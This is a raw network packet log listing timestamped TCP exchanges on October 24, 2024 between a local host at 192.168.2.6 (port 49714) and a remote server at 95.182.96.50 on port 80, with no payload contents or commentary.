Oct 24, 2024 13:54:15.123162031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123167992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123213053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123219967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123269081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123275995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123326063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123330116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123364925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123375893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123399019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123409033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123435020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123447895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123469114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123477936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123516083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123713017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123749018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123764992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123783112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123790026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123821974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123830080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123857975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123874903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123893023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123904943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123933077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123943090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.123964071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.123977900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124011993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124243021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.124284029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.124300003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124329090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124339104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.124373913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.124388933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124409914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.124423027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124444008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.124450922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124480009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.124490976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124516010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.124524117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124551058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.124562025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.124598026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.208276987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.208309889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.208367109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.237981081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238012075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238071918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238122940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238152027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238188028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238239050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238274097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238408089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238439083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238559961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238594055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238627911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238662004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238713026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238746881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238781929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238843918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238878012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238912106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238961935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.238996029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239031076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239362955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239397049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239435911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239470005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239542961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239598036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239650011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239684105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239717007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239749908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239783049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.239816904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.240175962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.240210056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.240262032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.240295887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.240329981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.240364075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.240397930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.240431070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.240464926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.241830111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.356738091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.356802940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.356825113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.356848955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.356862068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.356899023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.356906891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.356942892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.356954098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.356990099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357002020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357027054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357039928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357064962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357079983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357101917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357115030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357137918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357150078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357173920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357187033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357209921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357223988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357255936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357264996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357315063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357321978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357357025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357372999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357402086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357414007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357450008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357466936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357485056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357496023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357521057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357533932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357558966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357568026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357594013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357624054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357630968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357637882 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357681990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357686043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357722044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357734919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357757092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357758045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357793093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357805967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357831955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357840061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357867956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.357877016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.357923031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358302116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358336926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358356953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358374119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358377934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358419895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358428955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358465910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358474970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358505011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358515024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358542919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358549118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358578920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358592987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358616114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358624935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358652115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358663082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358689070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358704090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358726025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358731985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358762026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358776093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358802080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.358807087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.358850002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.359236002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.359292030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.469146967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.469223976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.469261885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.469296932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.469331026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.469363928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.469362974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.469362974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.469362974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.469362974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.469384909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.469402075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.469408989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.469439030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.469451904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.469476938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.469481945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.469518900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472158909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472191095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472213984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472225904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472246885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472285032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472292900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472325087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472342014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472378016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472410917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472415924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472434044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472446918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472446918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472491980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472507954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472543001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472556114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472588062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472596884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472632885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472640038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472667933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472676039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472706079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472709894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472745895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472832918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472868919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472884893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472903967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472909927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472949982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472954035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.472985029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.472992897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473021984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473031998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473067999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473196983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473253965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473284960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473289967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473290920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473325968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473335981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473361969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473368883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473397017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473402023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473436117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473439932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473468065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473479033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473510027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473642111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473676920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473692894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473712921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.473715067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.473756075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474051952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474101067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474107027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474142075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474153042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474178076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474186897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474215984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474220037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474257946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474272966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474308014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474318027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474342108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474342108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474385023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474396944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474431038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474452019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474464893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474471092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474503040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.474505901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.474545002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.584311008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.584355116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.584391117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.584461927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.584496021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.584530115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.584561110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.584563971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.584561110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.584561110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.584561110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.584594011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.584594011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.584624052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.587738991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.587795973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.587897062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.587933064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.587946892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.587975025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.587985039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588020086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588028908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588057041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588063955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588099957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588144064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588191986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588197947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588241100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588251114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588284969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588310957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588319063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588323116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588367939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588370085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588402033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588409901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588435888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588443995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588476896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588489056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588536024 CEST	49714	80	192.168.2.6	95.182.96.50
